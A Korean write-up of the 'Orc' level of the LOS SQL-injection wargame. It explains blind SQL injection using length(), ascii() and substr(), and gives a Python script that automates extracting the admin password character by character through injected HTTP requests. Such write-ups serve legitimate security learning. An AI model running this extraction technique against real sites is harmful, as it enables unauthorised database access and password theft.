[Orc] LOS 문제풀이4

   [Orc] LOS 문제풀이4

SQL Injection Web Hacking

LOS 사이트 : http://los.eagle-jump.org/

[힌트]

1. 주석처리

   # : %23  ' : %27

2. 패스워드 하나씩 다 찾아야 함

3. length 사용해 패스워드 길이 찾기

   length 사용법 : 길이를 알아볼 수 있다.

   ex) length('apple') = 5  -> 반환값 : 1(true)

4. ascii와 substr 이용해 하나씩 패스워드 찾기

   ascii 사용법 : 아스키코드표를 이용해서 문자를 10진수로 바꿀 수 있다.

   ex) ascii('a') = 97 -> 반환값 : 1 (true)

   substr 사용법 : 문자열에서 일부 문자열을 추출한다.

   ex) substr(문자열, 시작위치, 갯수)

        substr('apple',1,1) -> 반환값 : 'a'

        substr('apple',1,2) -> 반환값 : 'ap'

소스코드를 보면 pw가 정확히 맞아야 풀 수 있다.

pw에다 전 단계처럼 ' or 1=1#을 적용을 해 놓아도, admin의 패스워드와 비교해보기 때문에 패스워드를 일일히 알아내는 수 밖에 없다.

먼저 패스워드를 찾는 방법은 길이를 먼저 알아야 한다.

길이를 알아내는 방법은 length를 이용해서 알아볼 수 있다. ( ex) length(pw)=1 )

비교해본 결과 길이는 8이라는 것을 알 수 있다.

그리고나서 ascii와 substr를 이용해서 패스워드를 하나씩 찾아보았다. ( ex) ascii(substr(pw,1,1)) = 50 )

여기서 주의할 점은 만약에 패스워드를 찾을 때에 id='admin'이라는 것을 조건으로 제시해놓지 않는다면 다른 계정의 패스워드를 받아오기 때문에 잘못된 결과를 가져오게 된다. 따라서 앞에 문장이 거짓으로 해놓았다면 or 뒷문장에는 꼭 admin 조건을 추가해주어야 된다. 

[Orc 자동화 프로그램] - Python3

# LOS orc
 
import socket
 
for i in range(1,9):
    for ch in range(48,123):
        if 58 <= ch <= 64: continue
        if 91 <= ch <= 96: continue
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect(('104.27.174.42',80))
 
        header = "GET /orc_47190a4d33f675a601f8def32df2583a.php"
        header += "?pw=' or id='admin' and ascii(substr(pw,"+str(i)+",1))="+str(ch)+"%23 "
        header += "HTTP/1.1\r\n"
        header += "Host:los.eagle-jump.org\r\n"
        header += "Cookie:PHPSESSID=44b0qo6127nchlhrrohm2scc93\r\n"  # 쿠키는 현재 갖고 있는 세션값
        header += "\r\n"
 
        response = ''
    
        sock.send(header.encode())
        response = sock.recv(65535)
        response = response.decode()
        if "Hello admin" in response:
            print(chr(ch),end='',flush=True)
            sock.close()
            break;
        sock.close()
print()